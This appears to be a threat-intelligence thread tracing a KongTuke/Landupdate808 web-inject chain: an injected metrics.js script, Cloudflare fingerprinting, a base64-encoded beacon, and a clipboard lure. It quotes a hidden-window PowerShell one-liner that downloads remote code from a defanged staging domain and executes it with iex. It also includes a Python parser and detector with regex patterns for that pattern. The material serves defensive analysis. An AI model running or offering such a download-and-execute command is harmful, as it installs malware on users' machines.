Likely next #Landupdate808 / #Kongtuke infra:
rshank[.]com
Still was never able to get a payload from the last reported infra, vicrin[.]com
Well, I figured it out, thanks to some help by @rmceoin
Victim site
-->
rshank[.]com/metrics.js (Landupdate808 infra)
-->
cloudflare[.]com/cdn-cgi/trace (fingerprinting checks)
-->
hxxps[:]//rshank[.]com/js.php?device=[OS]&ip=[IP INFO]=&refferer=[REFERRER URL]=&browser=[BROWSER]&ua=[USER AGENT]&domain=[KONGTUKE INFRA]&loc=[COUNTRY CODE]=&is_ajax=1
Ctrl+C then copies
powershell -WindowStyle Hidden $global:block=curl -useb hxxp[:]//527newagain[.]top/1.php?s=527;iex $global:block.content
Not able to get the payload off of the curl command though, not sure if it's live.
cc @MalasadaTech figured you might be interested, this is a new tactic for them
HOWZIT! I'm very interested. Thanks for sharing! Will reply in a private mention.
loc=VVM= in the URL means "location". It comes from the CloudFlare call. VVM= is base64 for US. So in your example it means United States location.
blahblah.top /1.php ? s= format seemed familiar. @cyberamateur @rmceoin @MalasadaTech
Has anyone followed this on VirusTotal? The HTTP responses documented in VT look like obfuscated code, maybe made to look like legit google developer code?
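As an added example, not code posted by anyone in this thread and not the actor's own code: the Python script below takes a beacon URL built on the js.php shape shown above, decodes the base64-encoded fields (loc=VVM= decodes to US, as noted), and then flags the hidden-window download-and-execute PowerShell pattern in a few constructed process-creation log lines. Every domain in it is a placeholder, the ip and refferer values are constructed, and treating those two parameters as base64 is an assumption drawn from the trailing "=" in the template; only loc is confirmed as base64 in the thread.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlparse

# Constructed beacon URL modelled on the js.php request in the thread.
# Hostnames are placeholders, not the reported infrastructure.
SAMPLE_BEACON = (
    "https://landupdate-placeholder.example/js.php?"
    "device=Windows"
    "&ip=MTkyLjAuMi4xMA=="                      # constructed: base64("192.0.2.10")
    "&refferer=aHR0cHM6Ly92aWN0aW0uZXhhbXBsZS8="  # constructed: base64("https://victim.example/")
    "&browser=Chrome&ua=Mozilla/5.0"
    "&domain=kongtuke-placeholder.example"
    "&loc=VVM="                                 # from the thread: base64("US")
    "&is_ajax=1"
)

# Assumption: these three parameters carry base64 text (the template shows a
# trailing "=" on each of them and loc=VVM= is confirmed in the thread).
BASE64_FIELDS = ("ip", "refferer", "loc")


def decode_b64_field(value: str) -> Optional[str]:
    """Return the UTF-8 text behind a base64 value, or None if it is not clean base64."""
    try:
        raw = base64.b64decode(value, validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def parse_beacon(url: str) -> Dict[str, object]:
    """Split the fingerprint beacon into its fields and decode the base64 ones."""
    parsed = urlparse(url)
    # parse_qs splits each pair on the first "=", so base64 padding survives.
    params = parse_qs(parsed.query, keep_blank_values=True)
    fields = {name: values[0] for name, values in params.items()}
    decoded = {}
    for name in BASE64_FIELDS:
        if name in fields:
            plain = decode_b64_field(fields[name])
            # Fall back to the raw value so the record is never silently emptied.
            decoded[name] = plain if plain is not None else fields[name]
    return {
        "host": parsed.hostname,
        "path": parsed.path,
        "fields": fields,
        "decoded": decoded,
    }


# Indicators for the clipboard-delivered one-liner: hidden console window, a
# web download via the curl/iwr aliases with -useb, and execution through iex.
INDICATORS = {
    "hidden_window": re.compile(r"-windowstyle\s+hidden", re.I),
    "download": re.compile(r"\b(curl|iwr|invoke-webrequest)\b[^;|]*-useb", re.I),
    "execute": re.compile(r"\biex\b|invoke-expression", re.I),
}


def match_indicators(command_line: str) -> List[str]:
    """Names of the indicators present in one process command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(command_line)]


def is_download_and_execute(command_line: str) -> bool:
    """True when a command both fetches content over HTTP and hands it to iex."""
    hits = match_indicators(command_line)
    return "download" in hits and "execute" in hits


# Constructed process-creation log lines; the first mirrors the shape of the
# pasted command in the thread with the staging domain replaced by a placeholder.
SAMPLE_PROCESS_LOGS = [
    "powershell -WindowStyle Hidden $global:block=curl -useb "
    "http://stage-placeholder.example/1.php?s=527;iex $global:block.content",
    "powershell -NoProfile -Command Get-Process | Sort-Object CPU",
    'powershell -Command "curl -useb https://intranet.example/health"',
]


def find_pastejack_commands(lines: List[str]) -> List[str]:
    """Filter log lines down to those matching the download-and-execute pattern."""
    return [line for line in lines if is_download_and_execute(line)]


if __name__ == "__main__":
    beacon = parse_beacon(SAMPLE_BEACON)
    print("beacon host:", beacon["host"], "decoded:", beacon["decoded"])
    for line in find_pastejack_commands(SAMPLE_PROCESS_LOGS):
        print("suspicious:", line, "indicators:", match_indicators(line))
```

The third sample line carries only the download indicator, so it is not flagged; requiring both the fetch and the iex stage keeps ordinary -useb health checks out of the alert queue while still catching the one-liner regardless of which domain it points at.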
@cyberamateur @rmceoin @MalasadaTech Here's another question... what is the context around the curl command being copied? I see that Ctrl +C is mentioned, but what is the impetus for the user doing that?
I was thinking maybe a JS clipboard write or writeText method somewhere in the attack chain, but it looks like you may have identified the Ctrl+C somewhere?